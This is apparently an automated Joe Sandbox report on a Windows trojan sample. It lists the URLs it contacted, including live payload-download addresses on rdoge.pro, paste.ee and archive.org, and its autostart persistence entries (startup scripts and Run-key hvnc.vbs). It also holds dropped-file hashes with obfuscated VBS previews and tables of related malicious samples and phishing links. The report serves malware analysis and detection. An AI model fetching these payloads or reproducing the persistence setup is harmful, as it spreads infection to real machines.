https://analytics.paste.ee	powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://paste.ee	powershell.exe, 00000012.00000002.1650971505.000001AF1912A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6	powershell.exe, 00000010.00000002.3144999713.000001C51593D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://rdoge.pro/stc/wm_startup.zip	TM3utH2CsU.exe, 00000000.00000003.1436659897.000002069462F000.00000004.00000020.00020000.00000000.sdmp, TM3utH2CsU.exe, 00000000.00000003.1466683610.000002069462F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://rdoge.pro/stc/pure_hnvc1.ziphttps://rdoge.pro/stc/wm_startup.ziphttps://rdoge.pro/stc/pure_h	TM3utH2CsU.exe, 00000000.00000002.1745075290.00007FF681B4C000.00000002.00000001.01000000.00000003.sdmp, TM3utH2CsU.exe, 00000000.00000000.1351636173.00007FF681B4C000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtZHo;NrXbase64Content	powershell.exe, 00000012.00000002.1650971505.000001AF18F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.0000021700229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC84CA8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://rdoge.pro/stc/pure_hnvc1.zipo4	TM3utH2CsU.exe, 00000000.00000003.1407187350.000002069462F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000001E.00000002.1718239578.000001EC8638E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://rdoge.pro/nd/eneba_com_privacy_policy.pdf	TM3utH2CsU.exe, 00000000.00000003.1379876457.000002069462F000.00000004.00000020.00020000.00000000.sdmp, TM3utH2CsU.exe, 00000000.00000002.1730832059.00000206945BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://rdoge.pro/stc/pure_hnvc2.zip	TM3utH2CsU.exe, 00000000.00000003.1466683610.000002069462F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com	powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt	powershell.exe, 0000001E.00000002.1718239578.000001EC84CA8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://rdoge.pro/stc/pure_hnvc1.zip	TM3utH2CsU.exe, 00000000.00000003.1407187350.000002069462F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://paste.ee/d/82O7E/0	powershell.exe, 00000012.00000002.1650971505.000001AF1912A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC84E93000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000018.00000002.2167378345.0000021710077000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000012.00000002.1650971505.000001AF1A656000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1728472486.000001AF28D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.0000021701963000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2167378345.0000021710077000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://oneget.orgX	powershell.exe, 00000012.00000002.1650971505.000001AF1A3E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217016EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC86176000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://analytics.paste.ee;	powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://rdoge.pro/nd/eneba_com_privacy_policy.pdfFailed	TM3utH2CsU.exe, 00000000.00000000.1351636173.00007FF681B4C000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://rdoge.pro/stc/pure_hnvc1.zipf4	TM3utH2CsU.exe, 00000000.00000003.1407187350.000002069462F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ia600100.us.archive.org	powershell.exe, 00000012.00000002.1650971505.000001AF1A078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1650971505.000001AF18F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.0000021700229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.000002170169D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC860A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC84CA8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com	powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000010.00000002.3144999713.000001C515959000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1650971505.000001AF18CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.0000021700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC84A94000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdnjs.cloudflare.com;	powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://rdoge.pro/stc/pure_hnvc2.zip049p	TM3utH2CsU.exe, 00000000.00000003.1466683610.000002069462F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000010.00000002.3144999713.000001C515986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1650971505.000001AF18CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.0000021700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC84A94000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://rdoge.pro/stc/wm_startup.zipf4	TM3utH2CsU.exe, 00000000.00000003.1436659897.000002069462F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://secure.gravatar.com	powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://themes.googleusercontent.com	powershell.exe, 00000012.00000002.1650971505.000001AF192E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217004CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC85071000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://oneget.org	powershell.exe, 00000012.00000002.1650971505.000001AF1A3E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217016EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC86176000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ia600100.us.archive.org	powershell.exe, 00000012.00000002.1650971505.000001AF1A398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1667045038.00000217016A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1718239578.000001EC8612E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.47.168.24	unknown	United States	16625	AKAMAI-ASUS	false
143.198.209.174	unknown	United States	15557	LDCOMNETFR	false
188.114.96.3	unknown	European Union	13335	CLOUDFLARENETUS	false
207.241.227.240	unknown	United States	7941	INTERNET-ARCHIVEUS	false
135.224.23.113	unknown	United States	10455	LUCENT-CIOUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1518119
Start date and time:	2024-09-25 12:35:16 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	135
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TM3utH2CsU.exe renamed because original name is a hash value
Original Sample Name:	3658f44acb4d331fa89ab43d782bee2a97a48b2f425cad29939ee472c74bc62f.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@236/134@0/6
EGA Information:	Successful, ratio: 20%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for powershell

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.88.176, 18.207.85.246, 34.193.227.236, 54.144.73.197, 107.22.247.231, 162.159.61.3, 172.64.41.3, 2.19.126.149, 2.19.126.143, 2.23.197.184, 93.184.221.240, 192.168.2.10, 23.200.0.33
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, p13n.adobe.io, acroipm2.adobe.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
Execution Graph export aborted for target CasPol.exe, PID 3548 because it is empty
Execution Graph export aborted for target CasPol.exe, PID 8400 because it is empty
Execution Graph export aborted for target powershell.exe, PID 3768 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7204 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: TM3utH2CsU.exe

Simulations

Behavior and APIs

Time	Type	Description
06:36:34	API Interceptor	2x Sleep call for process: AcroCEF.exe modified
06:36:37	API Interceptor	573x Sleep call for process: powershell.exe modified
06:37:58	API Interceptor	3121520x Sleep call for process: CasPol.exe modified
12:36:41	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_sys.bat
12:36:55	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\hvnc.vbs
12:37:03	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\hvnc.vbs
12:37:12	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs
12:37:20	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_32.bat
12:37:29	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_pow.bat

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.47.168.24	8f40pUzDo8.exe	Get hash	malicious	Metasploit	Browse
	johnny.guanCopy.pdf	Get hash	malicious	Unknown	Browse
	Bonus_Payments_Health_Insurance_Vacation_Policy_Update_20243568Acer Liquid Z63568.pdf	Get hash	malicious	Unknown	Browse
	f_0000eb.pdf	Get hash	malicious	Unknown	Browse
	Giger & Partner Fall Nr. 893983 Gerichtsbescheid Vergleich Nr. 241624 GM.pdf	Get hash	malicious	Unknown	Browse
	v2.1.pdf	Get hash	malicious	Unknown	Browse
	YjtJRRgm3O.lnk	Get hash	malicious	Unknown	Browse
	Pure Storage Open Benefits Enrollment.pdf	Get hash	malicious	Unknown	Browse
	http://zenodo.org/records/12885815/files/modelo-contrato-prstamo-entre-familiares-sin-intereses-pdf.pdf	Get hash	malicious	Unknown	Browse
	IDR-500000000.pdf	Get hash	malicious	Unknown	Browse
188.114.96.3	PO23100072.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/ttiz/
	RFQ urrgently.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/1g7m/
	TNT AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp
	Petronas quotation request.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/
	Shipping Documemt.vbs	Get hash	malicious	Lokibot	Browse	werdotx.shop/Devil/PWS/fre.php
	Quotes updates request.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/1g7m/
	PO-001.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/kslt/
	PO2024033194.exe	Get hash	malicious	FormBook	Browse	www.rtpngk.xyz/876i/
	LOL and profile.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/STiUOnZN/download

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LDCOMNETFR	AWS 1301241710.docx.doc	Get hash	malicious	Remcos, PureLog Stealer	Browse	143.198.143.143
	file.exe	Get hash	malicious	Unknown	Browse	92.95.33.134
	file.exe	Get hash	malicious	Unknown	Browse	92.95.33.134
	SecuriteInfo.com.Linux.Siggen.9999.31454.15725.elf	Get hash	malicious	Unknown	Browse	80.124.112.10
	SecuriteInfo.com.Linux.Siggen.9999.13221.8731.elf	Get hash	malicious	Unknown	Browse	77.136.159.242
	SecuriteInfo.com.Linux.Siggen.9999.32167.12194.elf	Get hash	malicious	Unknown	Browse	37.69.4.24
	jade.arm.elf	Get hash	malicious	Mirai	Browse	62.39.174.133
	jade.m68k.elf	Get hash	malicious	Mirai	Browse	62.39.174.139
	jade.mips.elf	Get hash	malicious	Mirai	Browse	62.39.174.186
	Tsunami.arm.elf	Get hash	malicious	Mirai	Browse	37.67.167.239
INTERNET-ARCHIVEUS	BL.xls	Get hash	malicious	Remcos, PureLog Stealer	Browse	207.241.227.240
	Fwo62RjOqH.rtf	Get hash	malicious	Remcos, PureLog Stealer	Browse	207.241.227.240
	1zbL83sqmd.rtf	Get hash	malicious	Remcos, PureLog Stealer	Browse	207.241.227.240
	AWS 1301241710.docx.doc	Get hash	malicious	Remcos, PureLog Stealer	Browse	207.241.227.240
	Order draft.vbs	Get hash	malicious	Azorult, PureLog Stealer	Browse	207.241.227.240
	SPEC.xls	Get hash	malicious	Remcos, PureLog Stealer	Browse	207.241.227.240
	US0914424A.xla.xlsx	Get hash	malicious	Remcos, PureLog Stealer	Browse	207.241.227.240
	IEnetbookCookies.hta	Get hash	malicious	Cobalt Strike, Remcos, PureLog Stealer	Browse	207.241.227.240
	US091024A.xla.xlsx	Get hash	malicious	Remcos, PureLog Stealer	Browse	207.241.227.240
	Company profile.js	Get hash	malicious	PXRECVOWEIWOEI Stealer, PureLog Stealer	Browse	207.241.235.61
CLOUDFLARENETUS	z64MT103_126021720924_pdf.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	rcontractorder.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	z9OutstandingPayment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Ze1Ueabtx5.img	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	GJecwa34.cpl.exe	Get hash	malicious	Unknown	Browse	1.1.1.1
	rdoc17000320240923070456.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	John Lorenz-Employee-Benefits.docx	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Documenti di spedizione 0009333000459595995.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	John Lorenz-Employee-Benefits.docx	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	BL.xls	Get hash	malicious	Remcos, PureLog Stealer	Browse	188.114.97.9
AKAMAI-ASUS	Contract_Agreement_Tuesday September 2024.pdf	Get hash	malicious	Unknown	Browse	104.77.220.172
	https://www.canva.com/design/DAGRqYHU9fM/qLQ4eWyHLFZd4WO6lX1hvg/view?utm_content=DAGRqYHU9fM&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	HTMLPhisher	Browse	104.102.34.86
	ACeTKO93e9.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	https://www.dropbox.com/l/AACCJz_U-ZDLo7IXCzEFAx8aUAOQwxagfyU	Get hash	malicious	HTMLPhisher	Browse	104.102.43.106
	c1.pdf	Get hash	malicious	HTMLPhisher	Browse	104.77.220.172
	https://steamcomrnunity.com/tradofferr/new/partner=86339532token=R6G24Z6l	Get hash	malicious	Unknown	Browse	2.16.202.113
	https://sqeamconmmumnlty.com/activating/add	Get hash	malicious	Unknown	Browse	104.102.49.254
	https://sqeamconmmumnlty.com/one/get/put	Get hash	malicious	Unknown	Browse	104.102.49.254
	https://sqeamconmmumnlty.com/gen/active	Get hash	malicious	Unknown	Browse	104.102.49.254
	https://ebanksg.spdb.com.cn/sgbank/#/Home	Get hash	malicious	Unknown	Browse	104.78.188.188

Process:	C:\Users\user\Desktop\TM3utH2CsU.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	512470
Entropy (8bit):	3.7427314037215864
Encrypted:	false
SSDEEP:	12288:rIQpXYYN1wQKkiMKm3mRCHpxaz5dHXp7RInhQtEt+ok4mjklNBgvuGt/RDxKZ9Kc:8ER2UAEouxp
MD5:	2B8D25778728E1726813C46DA1AF28E0
SHA1:	0210191910A4CD987207077FA4A58014BEB9DE3E
SHA-256:	8D0882228D20C2148B1F0E959C79442DE52F0ECB9EC26308ED66B612D0F4E80F
SHA-512:	85980BD5414F3BFCABF9D314EE412237611CCB2D70C9F36587E41A4725BCD876F321CF50DB6CA119FC1B9B4E63EE4BB6D6D5986EAF65AC0995079DB13D5D2228
Malicious:	false
Preview:	PK.........=9Y.Z..............hnvc.vbs..........P.L.g.N.d.L.u.q.a.Q.A.k.L.T.b.W.q.Z.t.k.W.G.L.a.i.L.K.L.n.f.l.G.h.i.G.Z.o.G.W.c.K.G.L.W.p.A.u.W.Q.m.e.c.i.U.W.W.i.m.x.N.T.N.p.N.G.C.A.b. .=. .".W.j.W.W.l.U.n.W.m.t.L.W.L.L.h.a.Z.C.W.G.z.P.i.W.K.K.Q.f.a.L.W.k.f.P.W.l.c.i.q.k.W.G.c.K.U.L.G.L.v.R.m.B.n.a.L.P.x.c.h.T.U.x.O.c.O.c.z.a.".....c.L.b.z.q.c.i.K.A.Z.G.B.a.c.e.A.L.v.e.W.h.L.d.g.x.P.k.c.e.Q.K.d.o.c.c.R.u.u.I.N.e.h.K.e.L.W.R.K.L.z.a.N.c.m.N.O.P.U.K.W.A.B.I.e.L.f.p.k. .=. .".J.k.A.p.c.B.k.A.L.b.r.C.n.W.W.K.c.i.g.a.n.o.o.v.C.p.K.x.I.i.L.i.z.l.n.T.c.z.N.h.c.d.t.L.W.o.d.c.a.k.x.K.e.b.e.e.L.k.n.l.G.U.i.u.W.N.U.A.G.G.p.p.".....L.e.A.L.i.L.Q.Z.m.i.L.o.c.s.U.U.u.W.e.P.p.A.g.W.W.e.S.L.L.r.s.s.u.G.L.K.S.Z.L.e.l.i.U.Z.i.x.W.I.L.C.i.L.G.H.j.i.r.N.z.U.R.k.f.L.T.G.L.i. .=. .".W.x.P.r.g.i.l.G.W.h.m.Z.b.x.L.u.f.h.I.G.f.L.m.U.m.P.C.W.W.U.p.J.f.i.N.o.L.c.W.d.N.C.O.m.A.H.A.c.W.K.L.i.O.U.O.W.f.U.j.R.U.L.A.k.L.f.i.f.".....i.h.m.G.L.v.T.i.l.u.W.G.O.W.O.K.h.R.L.i.Z.u.z.W.L.W.m.J.m.O.N.x.L.c.c.C.s.f.L.W.L.a.L.

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	290
Entropy (8bit):	5.23698960477022
Encrypted:	false
SSDEEP:	6:PuVca1M+q2PFi2nKuAl9OmbnIFUt82uVRCSZZmw+2uVRCSMMVkwOFi2nKuAl9Omt:P2DM+vdZHAahFUt822cSZ/+22cSMMV5J
MD5:	BFD3F462D6340993AB4D0C62E3303744
SHA1:	561E41CA762ACA8584CDD44ADE8B56237FC585F4
SHA-256:	8BCA3C71FD79A5BE7FB5A9D704903A24D6C04403DEE1B570148276245946ADCF
SHA-512:	9B227E3E16DC2387BF1BAAF1E42D1400360874BA09C469D2B3403D1CB87BCA8A3B2CAC39224B18274A7D8E8366C9D9FB17E2217A2B461E65EB0C3779F99AC242
Malicious:	false
Preview:	2024/09/25-06:36:21.511 1ffc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/09/25-06:36:21.514 1ffc Recovering log #3.2024/09/25-06:36:21.514 1ffc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	323
Entropy (8bit):	5.363435887027673
Encrypted:	false
SSDEEP:	6:Q3La/xwcz92W+P12MUAvvr3tDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hz92n4M9tDLI4MWuPTAv
MD5:	A92E44C0313DAFEC1988D0D379E41A2F
SHA1:	C2F5644C418A81C1FB40F74298FF39D1420BFAC0
SHA-256:	F3F3E681BE07C36042639B1679ACF8B2D23BE037713D5E395C48006840DBE77A
SHA-512:	4F32FE6F35FC6EB4D4CF41EDEDE3C6B3FDFE31E58DA6FC7B301B1EBD3FBEEE64681C928B45E87CD556A1D32D32CB5932764EAB22FFEE11E42B8D5EB0DCFDC22C
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

Process:	C:\Windows\System32\wscript.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	515028
Entropy (8bit):	3.740796132518701
Encrypted:	false
SSDEEP:	12288:ElKHt8mQeE9b9xefCRexf049pZBJN7ZnU5AuK337QpGAgHigiHETJc:xZxDEqql
MD5:	9925D6B112CC586B4C53B9EC22AC9EE3
SHA1:	D3A6302D2D70999036849A9CF046EE868BA78427
SHA-256:	C7D27223D3EEB698EEEA7EAC9681158F66C0091F5FC2E8EC95C979F324227373
SHA-512:	271479F0A7B313E734CC06C26932E101B75BCC4DD0BB7C1344B0E7A888BF1D8D67289639471EB27ED643807820ECB98C621D319D35C31E8C25BA475D2056997D
Malicious:	true
Preview:	..........m.i.U.H.Z.l.u.t.k.m.N.R.q.L.K.Z.o.m.c.K.m.p.o.c.L.l.o.e.L.c.O.W.p.k.k.W.W.m.J.k.h.P.G.Z.h.L.W.a.W.k.A.G.f.k.P.k.k.u.o.L.Z.c.L.N.W.k.i.t. .=. .".G.l.U.i.K.q.W.U.W.G.e.K.K.W.k.b.W.K.W.W.I.A.e.U.R.O.a.q.P.G.O.a.p.t.W.W.Z.n.G.K.h.b.u.i.W.O.c.L.W.l.e.c.c.L.Z.W.B.l.i.b.i.L.U.k.c.l.k.Z.".....u.O.G.A.f.K.q.c.q.k.e.z.v.L.G.B.p.L.n.z.c.U.K.s.i.G.N.G.G.u.G.g.P.g.G.W.u.K.x.d.n.i.C.N.z.L.i.N.U.p.W.K.o.L.I.f.O.k.k.G.O.i.W.L.L.z.p.a. .=. .".W.K.c.K.U.f.B.z.L.P.q.t.j.b.T.W.W.q.u.O.l.u.Z.q.W.H.G.L.i.O.W.L.l.u.p.c.P.W.L.L.b.U.c.K.H.i.f.b.s.W.B.J.k.B.U.S.f.W.c.G.G.a.N.W.L.e.K.P.".....i.p.L.O.K.N.c.o.W.p.i.H.z.c.Z.h.k.s.L.n.e.W.W.K.l.G.L.z.B.U.W.b.i.p.k.b.k.N.o.m.K.G.h.c.c.k.q.A.c.x.K.u.z.m.d.f.Q.L.e.I.e.L.u.K.a.j.L.G. .=. .".u.j.h.U.G.L.o.c.N.f.n.k.A.N.i.L.d.t.G.v.f.L.o.z.l.I.o.m.N.U.q.g.h.G.U.n.q.k.J.L.q.p.L.p.R.W.h.L.L.i.s.t.U.W.i.C.f.L.o.W.i.U.U.l.T.L.g.R.".....N.K.p.W.m.d.H.i.m.n.C.h.K.o.K.R.Z.b.v.L.A.z.Z.L.j.W.p.z.R.K.m.L.L.O.W.d.n.G.L.C.U.S.k.o.L.p.z.i.U.B.L.c.G.l.e.P.z.b.v.Z.J.f.C.g.B.x.

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.197720446671199
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	TM3utH2CsU.exe
File size:	2'348'312 bytes
MD5:	2b39077634e7172489d66ed8e66ae63a
SHA1:	600467d0e3eadb245e451930dee698d1fc37ca23
